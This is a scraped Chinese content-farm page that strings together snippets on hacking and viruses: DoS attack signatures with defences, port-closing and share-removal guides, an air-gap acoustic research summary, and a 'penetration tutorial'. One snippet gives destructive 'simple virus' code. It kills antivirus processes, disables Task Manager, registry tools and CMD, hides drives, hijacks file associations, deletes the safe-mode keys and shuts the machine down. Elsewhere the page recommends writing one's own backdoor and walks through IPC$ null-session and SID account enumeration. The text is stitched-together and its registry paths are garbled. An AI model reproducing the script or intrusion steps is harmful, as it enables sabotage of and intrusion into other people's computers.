为您找到与黑客代码教程最简单入侵电脑方式相关的共200个结果:
电脑病毒就像黑客一样,无处不在,侵害着人们电脑!你知道黑客是怎么样入侵的吗!下面由读文网小编给你做出详细的黑客攻击的步骤分解介绍!希望对你有帮助!
最好自己写后门程序,用别人的程序总是相对容易被发现。
浏览量:2
下载量:0
时间:
有时候我们的电脑时常被黑客攻击,挡都挡不住,下面由读文网小编给你做出详细的黑客攻击电脑方式分析介绍!希望对你有帮助!
入侵检测的最基本手段是采用模式匹配的方法来发现入侵攻击行为,要有效的进反攻击首先必须了解入侵的原理和工作机理,只有这样才能做到知己知彼,从而有效的防止入侵攻击行为的发生。下面我们针对几种典型的入侵攻击进行分析,并提出相应的对策。
1.Land攻击
攻击类型:Land攻击是一种拒绝服务攻击。
攻击特征:用于Land攻击的数据包中的源地址和目标地址是相同的,因为当操作系统接收到这类数据包时,不知道该如何处理堆栈中通信源地址和目的地址相同的这种情况,或者循环发送和接收该数据包,消耗大量的系统资源,从而有可能造成系统崩溃或死机等现象。
检测方法:判断网络数据包的源地址和目标地址是否相同。
反攻击方法:适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为(一般是丢弃该数据包),并对这种攻击进行审计(记录事件发生的时间,源主机和目标主机的MAC地址和IP地址)。
2.TCP SYN攻击
攻击类型:TCP SYN攻击是一种拒绝服务攻击。
攻击特征:它是利用TCP客户机与服务器之间三次握手过程的缺陷来进行的。攻击者通过伪造源IP地址向被攻击者发送大量的SYN数据包,当被攻击主机接收到大量的SYN数据包时,需要使用大量的缓存来处理这些连接,并将SYN ACK数据包发送回错误的IP地址,并一直等待ACK数据包的回应,最终导致缓存用完,不能再处理其它合法的SYN连接,即不能对外提供正常服务。
检测方法:检查单位时间内收到的SYN连接否收超过系统设定的值。
反攻击方法:当接收到大量的SYN数据包时,通知防火墙阻断连接请求或丢弃这些数据包,并进行系统审计。
3.Ping Of Death攻击
攻击类型:Ping Of Death攻击是一种拒绝服务攻击。
攻击特征:该攻击数据包大于65535个字节。由于部分操作系统接收到长度大于65535字节的数据包时,就会造成内存溢出、系统崩溃、重启、内核失败等后果,从而达到攻击的目的。
检测方法:判断数据包的大小是否大于65535个字节。
反攻击方法:使用新的补丁程序,当收到大于65535个字节的数据包时,丢弃该数据包,并进行系统审计。
4.WinNuke攻击
攻击类型:WinNuke攻击是一种拒绝服务攻击。
攻击特征:WinNuke攻击又称带外传输攻击,它的特征是攻击目标端口,被攻击的目标端口通常是139、138、137、113、53,而且URG位设为“1”,即紧急模式。
检测方法:判断数据包目标端口是否为139、138、137等,并判断URG位是否为“1”。
反攻击方法:适当配置防火墙设备或过滤路由器就可以防止这种攻击手段(丢弃该数据包),并对这种攻击进行审计(记录事件发生的时间,源主机和目标主机的MAC地址和IP地址MAC)。
5.Teardrop攻击
攻击类型:Teardrop攻击是一种拒绝服务攻击。
攻击特征:Teardrop是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包(IP分片数据包中包括该分片数据包属于哪个数据包以及在数据包中的位置等信息),某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。
检测方法:对接收到的分片数据包进行分析,计算数据包的片偏移量(Offset)是否有误。
反攻击方法:添加系统补丁程序,丢弃收到的病态分片数据包并对这种攻击进行审计。
6.TCP/UDP端口扫描
攻击类型:TCP/UDP端口扫描是一种预探测攻击。
攻击特征:对被攻击主机的不同端口发送TCP或UDP连接请求,探测被攻击对象运行的服务类型。
检测方法:统计外界对系统端口的连接请求,特别是对21、23、25、53、80、8000、8080等以外的非常用端口的连接请求。
反攻击方法:当收到多个TCP/UDP数据包对异常端口的连接请求时,通知防火墙阻断连接请求,并对攻击者的IP地址和MAC地址进行审计。
对于某些较复杂的入侵攻击行为(如分布式攻击、组合攻击)不但需要采用模式匹配的方法,还需要利用状态转移、网络拓扑结构等方法来进行入侵检测。
浏览量:3
下载量:0
时间:
病毒木马入侵的方式有些想都想都想不到,不用心是很难发现的,那么电脑病毒木马入侵的方式有哪些呢?下面由读文网小编给你做出详细的电脑病毒木马入侵的方式介绍!希望对你有帮助!
划时代的Java更高效、更方便——不过是悄悄地修改你的注册表,让你千百次地访问黄(黑)色网站,让你关不了机,让你……,还可以让你中木马。这种方法其实很简单,先利用HTML把木马下载到你的缓存中,然后修改注册表,指向其程序。
浏览量:2
下载量:0
时间:
你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由读文网小编给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
修改系统时间:
置现行时间 (到时间 (“8888年8月8日”))
禁用任务管理器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, 0)
禁用注册表:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableregistrytools”, 1)
隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, 1)
隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:
写注册项 (3, “SoftWare Microsoft Windows CurrentVersion PoliciesWinOldAppDisabled”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
OVER360防御:
写注册项 (4, “SOFTWARE360SafesafemonExecAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonMonAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonSiteAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonUDiskAccess”, 0)
结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
隐藏所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives”, 4294967295)
禁止所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive”, 4294967295)
隐藏文件夹选项:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, 1)
将桌面对象隐藏:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “SoftwarePoliciesMicrosoftWindowsSystemDisableCMD”, 1)
隐藏主页选项组:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage”, 1)
隐藏IE文件菜单:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu”, 1)
隐藏收藏夹菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFavorites”, 1)
禁用IE打印功能:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoPrinting”, 1)
隐藏Internet选项:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions”, 1)
禁止IE查看源文件:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource”, 1)
禁用IE下载功能:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionInterner Settingsones31803”, 3)
禁止右键关联菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu”, 1)
修改文件关联:
写注册项 (1, “.txt”, “jpegfile”)
写注册项 (1, “.inf”, “jpegfile”)
写注册项 (1, “.reg”, “jpegfile”)
写注册项 (1, “.exe”, “jpegfile”)
无法进入安全模式:
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{36FC9E60-C465-11CF-8056-444553540000}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E965-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E969-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96A-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96F-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E973-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E974-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E975-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E977-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97D-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E980-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{71A27CDD-812A-11D0-BEC7-08002BE2092F}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAFD”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAppMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBase”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot file system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBrowser”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkCryptSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDcomLaunch”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDhcp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmadmin”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmboot.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmio.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmload.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmserver”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDnsCache”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkEventLog”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFile system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFilter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkHelpSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkip6fw.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkipnat.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanServer”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanWorkstation”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLmHosts”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkMessenger”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS Wrapper”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOSGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBT”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetDDEGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetlogon”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetMan”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetworkProvider”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNtLmSsp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPCI Configuration”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPlugPlay”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP Filter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP_TDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPrimary disk”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpcdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpwd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdsessmgr”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkRpcSs”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSCSI Class”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksermouse.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSharedAccess”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksr.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSRService”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkStreams Drivers”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSystem Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTcpip”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpipe.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdtcp.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkermservice”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvga.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvgasave.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWinMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWZCSVC”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBoot”)
关机:
关闭系统 (2, 假)
关机2:
运行(“shutdown -s -f ”)
以上是读文网小编给朋友们做出的总结!希望对你们有帮助!
看了“最简单的电脑病毒代码是什么”文章的还看了:
浏览量:2
下载量:0
时间:
借用人耳听不到的声波入侵电脑,然后通过系统的扬声器进行传输,这种事听着像是007电影中的情节。但是,两名德国研究者表示,这种事并不只是传说。下面由读文网小编给你做出详细的黑客用扬声器病毒入侵电脑介绍!希望对你有帮助!
通过一种用于水下数据传输的技术,Goetz 和 Hanspach 能够在大家常用的联想之类的笔记本上实现小数据包的发送和接受。
这种技术具有一定的局限性。它的传输速度只有20比特每秒,而且传输范围只有60英尺。这种速度太慢了不足以用于传输声音或是视频文件,但是它用于传输一些重要的信息片段就绰绰有余了,比如密码、或是由键盘记录软件所记录的敏感数据等。
为了用这种方法传输、接收信息,电脑必须先装上特殊的软件——所以瞎担心有人通过持有接近你电脑的声源侵入你的电脑,那完全是多虑了。不过,牛逼的黑客们大概可以通过气隙(air gapped)窃取电脑中的数据。也就是说,为了确保数据安全,电脑网络是断开的。如果黑客设法给该电脑植入恶意软件,这软件可以通过这台电脑的扬声器将数据传到附近联网的电脑中。传输信号在附近的设备中跳转,构成网状网络(mesh network),直到它找到一台带有网络的设备为止。然后黑客就能通过这台设备的网络拿到数据。
研究者对这种设备的不法用途进行了猜测:“例如,他们可以读取出电子狗和智能卡的反馈数据,那么到时候就会出现两名持有证件的用户,真正的用户将不得不设法证明自己才是真身。”
由于这种设备之前并没有成功实现过,所以系统管理员的安全管理措施中并没有将之考虑在内。因为之前声学问题并不再电脑安全的考虑范围之内。现在技术的发展使得许多传统的安全措施都不再安全。
研究人员也指出了一些防御方法。最简单的方法就是关闭电脑的扬声器或是麦克风。如果这些设备无法关闭,那么进行音频过滤也是可以的。虽然研究者进行实验所建的只是一个简单的概念验证系统,但是原理相似的病毒可能已经存在了,而且功能可能比研究者的模拟设备更强悍。
看了“黑客用扬声器病毒入侵电脑介绍”文章的还看了:
浏览量:3
下载量:0
时间:
电脑病毒的入侵方式有很多很多!你知道多少种呢!读文网小编带你一起去了解!
计算机病毒在网络上一般是通过"工作站"到"服务器"到"工作站"的途径进行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。
浏览量:3
下载量:0
时间:
下面小编教大家几个简单的电脑设置,让你的电脑远离黑客。因为你的电脑如果被黑客入侵了,那么你的什么隐私也没了。
木马程序会窃取所植入电脑中的有用信息,因此我们也要防止被黑客植入木马程序,常用的办法有:
1、在下载文件时先放到自己新建的文件夹里,再用杀毒软件来检测,起到提前预防的作用。
2、在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目,如果有,删除即可。将注册表里 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun下的所有以“Run”为前缀的可疑程序全部删除即可。
浏览量:3
下载量:0
时间:
电脑病毒攻击目标是电脑各种系统,以及主机到各种传感器、网桥等,以使他们的电脑在关键时刻受到诱骗,而导致崩溃,无法发挥作用。以下读文网小编整理的电脑病毒的入侵方式及防范方法,供大家参考,希望大家能够有所收获!
随着电脑在社会生活各个领域的广泛运用,电脑病毒几乎已经遍及社会的各个领域,只要接触过电脑的人都能碰上它。伴随着电脑的发展,给电脑系统带来了巨大的破坏和潜在的威胁。严重地干扰了人们的正常生活,给电脑网络的发展也带来了负面的影响。因此,为了确保电脑系统的安全及网络信息的安全,研究对付电脑病毒的措施已显得很重要了。因而,电脑病毒的防范技术也得不断拓展升级。
人们设计电脑软件的目标主要是追求信息处理功能的提高和生产成本的降低,而往往忽略了安全问题。这就给电脑病毒的发展提供了一个广阔的空间,而电脑系统的各个组成部分,接口,各层的相互转换,都存在着不少漏洞。再加上硬件设什缺乏整体安全性考虑,也不可能做到百分之百的安全,软件方面也更易存在隐患。电脑系统的脆弱性,为电脑病毒的产生和传播提供了可乘之机; “网络全球化”,更为电脑病毒创造了实施破坏的环境;随着电子技术的发展日趋完善,新的电脑应用技术所涉猎的领域也越来越广泛,为电脑病毒实现破坏提供了一个平台。
电脑病毒攻击目标是电脑各种系统,以及主机到各种传感器、网桥等,以使他们的电脑在关键时刻受到诱骗,而导致崩溃,无法发挥作用。
1、我们可从管理上预防。
(1)、不使用来历不明的软件,尤其是盗版软件。机房应禁止未经检测的移动盘插入电脑,严禁上机打游戏。因为游戏的运行环境较多,传染病毒的可能性较大。
(2)、对所有的系统盘以及移动盘进行写保护,防止盘中的文件被感染。
(3)、系统中的重要文件要进行备份,尤其是数据要定期备份。
(4)、网络上要限制可执行代码的交换,建立好较好的口令,规定合理的读写权限。
2、我们 也可从技术方法上预防
(1)、采用内存常驻防病毒的程序
在系统启动盘的AUTOEXE.BAT文件中加入一个病毒检测程序,它将时刻监视病毒的侵入,并对磁盘进行检查。由于这种方法要占用内存空间,又容易引起与其他程序的冲突,有些病毒具有躲开防毒程序的功能,所以,不能把它作为防病毒的主要武器。
(2)、检测将要运行的文件
这种方法主要采用杀毒软件进行检查,不是所以的杀毒软件都能清楚所有病毒,所以还是要注意以预防为主。
(3)、改变文档的属性
只读文档时不能修改的,有些病毒只能去掉只读标志,不能改变属性。这种方法不失为一种简单的方法来预防病毒。但它只是针对一般的文件型病毒而言。
(4)、改变文件扩展名
由于电脑感染时必须采用了解文件的属性,对每种不同的文件都必须使用不同的传染方式,将可执行文件的扩展名改变后,多数病毒会失去效力。
现代电脑病毒是多种多样的,杀毒软件也是比较先进的。但病毒的更新换代速度也非常之快,我们不能等闲视之。要树立良好的安全意识,才能在电脑病毒的防护方面取得较好的成绩,给单位人们的学习、工作提供更加安全舒适的环境。
浏览量:2
下载量:0
时间:
欢迎来到读文网,本文为大家带来怎样防止电脑被黑客入侵,希望能帮助到你。
我们的防火墙是不是经常有人来攻击你XXX端口呢?如果关掉相应没有用处的端口不就好了吗? 一般来说,我们采用一些功能强大的反黑软件和防火墙来保证我们的系统安全,本文拟用一种简易的办法——通过限制端口来帮助大家防止非法入侵-----如何关闭系统中的一些端口,同时如何关闭WINDOWS 下的默认共享C$、D$、Admin$、IPC$等等。
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口。
第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。
第三步,再重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。
第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。
第五步,进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。
这时候你就可以电脑了,重新启动后,电脑中上述网络端口就被关闭了,在这时候病毒和黑客应该是已经不能连上这些端口了,从而保护了你的电脑。
以下要说的是怎样关闭WINDOWS下的默认共享C$、D$、Admin$和IPC$等等。
大家应该知道在WINDOWS 2000和WINDOWS XP下会有默认的共享,病毒和黑客也可以通过这个途径进入你的电脑,从而来毁坏你的文件甚至远程控制你的电脑,这时就应该删除这些默认的共享(其实这些默认的共享对于你个人来说,只是有百害而无一利,这时我个人的看法噢,有意见大家提哟)。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
这里要先说WINDOWS XP的操作系统,XP可不比2000那么容易对付啰,在我还没找到方法之前,在QQ上碰到“封情绝爱”,问了一下,没想到当时他也没有想到方法,过了15钟左右,当时我在网上已经查到用net share *$ /del这个方法时,“封情”也同时告诉我要用这个命令,真是英雄所见略同。
如果你只是偶尔很少用的电脑,你可以在“开始”菜单里选择“运行”,然后在里面输入“net share *$ /del”(*代表你要删除的共享的名称)就可以了。但是在下次开机以后还会有这个默认的共享,怎么样才能彻底完全的在开机后就关闭这些默认共享呢,Follow me ,let’s go.
现在就要说如何在开机后,WINDOWS会自动关闭所有的默认共享,WINDOWS 2000和WINDOWS XP在这里也是大同小异,在“开始”菜单里选择“运行”,填入“regedit”,打开注册表[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]分支,在其下新建“字符串值”,命名可随意,比如“delshareC$”,鼠标右键单击,在弹出的快捷菜单中左键单击“修改”,在接着出现的“编辑字符串”窗口的“数值数据”一栏中输入“net share C$ /del”(不包括引号)按“确定”按钮。同理添加“字符串值”如“delshareD$”,“数值数据”为“net share D$ /del”等,有几个分区就加到哪为止,包括“net share Admin$ /del”等等,注意:这里有大小写之分。之后保存注册表重启计算机,就能实现开机自动关闭这些特殊共享资源了。
但是,大家有没有发现,“net share IPC$ /del”这个命令对于“IPC$”根本就不起任何作用,它还是保持着默认共享怎么办???(实际上做到这一步已经够了,无需在关闭IPC$了)
在这里呢,我还要感谢我的培训老师“Mozart”,是他指导了我怎样才能永久关闭IPC$和默认共享依赖的服务:lanmanserver即server服务,还需要到“控制面板”里的“管理工具”内,找到“服务”在到“server服务”(右击)进入“属性”,点击“常规”,在“启动类型”这一项中选择“已禁用”,这样就关闭了IPC$的默认共享。但是这就会产生一定的负面效应,一旦你关闭了了IPC$的默认共享,很多的Server服务你就不能利用,同时也可能会发生你不能访问局域网内的其他电脑,请慎用!
浏览量:2
下载量:0
时间:
许多人想要学习黑客基础知识,成为一名电脑高手,但是苦苦没有教程怎么办?读文网小编就在这里教大家黑客基础教程中黑客入侵渗透教程,希望能帮到大家。
黑客基础教程中黑客入侵渗透教程有一种被动操作系统识别方法,就是监控不同系统之间网络包的情况来判断目标的操作系统类型siphon被用来进行这方面的测试,这个工作原理如下:
主要TCP的四个字段判断:
1,TTL:出站的包的存活时间;
2,Window size:窗口大小;
3,DF:是否设置了不准分片位;
4,TOS:是否设置了服务类型。
综合这些信息可以大概判断出目标的系统,但不能百分百确定。
黑客入侵渗透第一步:查点
利用查点技术可以得到比前面讲的更多更具体的有用信息,例如:帐户信息等。
1,Windows系统查点技术
利用NetBIOS规则,首先介绍NetBIOS,NetBOIS位于TCP/IP之上,定义了多个TCP和UDP端口。
----TCP
(1),139:nbsession:NetBOIS会话。
例如:net use \IPipc$Content$nbsp;" " /user:" ".
(2),42:WINS:Windows Internet名字系统(UDP端口也是42)。
----UDP
(1)137:nbname:名字查询。
例如:nbtstat -A IP //03中显示的不是计算机名就是用户名
(2)138:nbdatagram:UDP数据报服务
例如:net send /d:domain-name "Hello"得到用户名利用到了IPC$空会话和sid工具。sid工具由两个小工具组成:user2sid 和sid2user.user2sid获得用户名或组名的sid;sid2user则是输入一个sid而获得相 应用户名的和组名,sid就是在创建用户时而创建的,相当于UNIX系统下的UID,WIN 系统权限的检查就是通过对SID的检查的。一个sid是由一长串数字组成的,其中包 括两个部分,前一部分用来唯一标识一个域,后一部分唯一标识一个用户名,这部 分数字被称作rid,既相对标识符,rid有一定的规律,其取总是从500开始的,超 级管理员的rid总是500,而GUEST用户的rid总是501;而新建立的帐户的rid从1000
开始。
具体的步骤:
c:et use \IPipc$Content$nbsp;" " /user:" "
c:user2sid \IP guest //得到了SID的前半部分s-1-5-21-1123561945-1580818891-1957994488-501
s是sid的前缀,后面跟的是1表示版本号,5用于标识发放sid的授权实体,5指NT/2 000。21-1123561945-1580818891-1957994488唯一地标识域和工作组。不同的用户 只是最后的相对标识符不一样。现在用sid2user查询系统的用户名了:
c:sid2user \IP 5 21 1123561945 1580818891 1957994488 500
name is cookie
domain is condor
c:sid2user \IP 5 21 1123561945 1580818891 1957994488 1001
SNMP查点:通过默认的管理群字符串PUBLIC读取特性,可以得到系统的一些信息, 具体有:接口表,路由表及ARP表,TCP表和UDP表,设备表和存储表,进程表和软件 表,用户表,共享表。SNMP工具,snmputil.exe
例如:
1,或者网络接口数目:
c:snmputil get localhost public .1.3.6.1.2.1.2.1.0
